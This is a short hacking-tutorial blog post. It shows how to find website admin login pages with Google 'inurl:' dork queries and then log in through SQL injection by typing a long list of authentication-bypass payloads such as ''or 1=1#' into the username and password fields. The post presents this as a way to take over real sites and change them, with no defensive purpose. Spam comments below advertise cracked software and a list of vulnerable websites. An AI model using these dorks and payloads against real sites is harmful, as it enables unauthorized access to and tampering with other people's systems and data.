Pages

HOW TO HACK WEBSITE USING SQL INJECTION ATTACK

HOW TO HACK WEBSITE USING SQL INJECTION ATTACK

sql-injection

Hello guys I will show you how to hack website using SQL injection attack. SQL injection attack is a code injection technique or method, which is used to attack data driven applications. In this attack, malicious SQL statements are inserted in entry field for execution. SQL injection attack (SQLIA) is considered one of the top web application vulnerabilities. By using SQL Injection method it is very easy to hack vulnerable website. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. Now I am going to show how it works, you just follows my steps….


 

Step 1 :- First you search the admin page of vulnerable web site. For searching vulnerable web page you take the help of google . Open your google page and use following script.

                 Use any one of the following…

“inurl:admin.asp”

“inurl:login/admin.asp”

 “inurl:admin/login.asp”

-“inurl:adminlogin.asp”

 “inurl:adminhome.asp”

 “inurl:admin_login.asp”

 “inurl:administratorlogin.asp”

“inurl:login/administrator.asp”

 “inurl:administrator_login.asp”

“inurl: admin.php”

   “inurl: login/admin.php”

 “inurl: admin/login.php”

 “inurl: adminlogin.php”

 “inurl: adminhome.php”

 “inurl: admin_login.php”

 “inurl: administratorlogin.php”

 “inurl: login/administrator.php”

 “inurl: administrator_login.php”

1

In above fig. you see there is many admin page open, now just open any one page.

 

Step 2 :- Now you can use the following code and inject into user id and password field.

             For user id used admin  as user id.

             And in password field use one one of the following code and some times these codes are also used for both user id as well as password.

test’or1–

‘or 1=1#

1’or’1’=’1

‘)or1=1—

‘or ” = ‘

‘or’1’=’1

‘ or ‘1’=’1

‘ or ‘x’=’x

‘ or 0=0 –

” or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

‘or’1=1′

‘or’ ‘=’

SQL injection attack

 

After injection following code then click submit. Here you go I am successfully login into admin page now you can do any modify or change in this website.

 SQL injection attack

 


Labels:

About the Author

I'm Hung Duy, the founder of Xml Blogger Templates (XBT). I'm a freelance writer on topics related to Website Optimization (SEO), blogger customizations and making money online. I'm blogging since 2006 and I'm currently a guest blogger on Blogging With Success.
Follow Me on Twitter or On Facebook


Visit xmlbloggertemplates.com for more Blogger Templates

4 comments:

hh said...

CLICK HERE For Fresh 10000 SQLi Vulnerable Websites 2015 List

August 12, 2015 at 10:05 AM
Unknown said...

awesome sharing...thank you for this useful information.
cracked software downloads | Spyzooka Activation Code

September 1, 2015 at 12:13 AM
Unknown said...

There are thousands of ways to make money, however just one can give you that great financial breakthrough. Every online opportunity must be carefully investigated before starting. Here is the great opportunity to secure your investment and earn more .
how to earn money online

September 21, 2015 at 3:57 AM
Unknown said...

thanks for wonderful piece of information..its really helful sharing!
Cracked Software Download

December 1, 2015 at 11:04 PM

Post a Comment

 
Designed by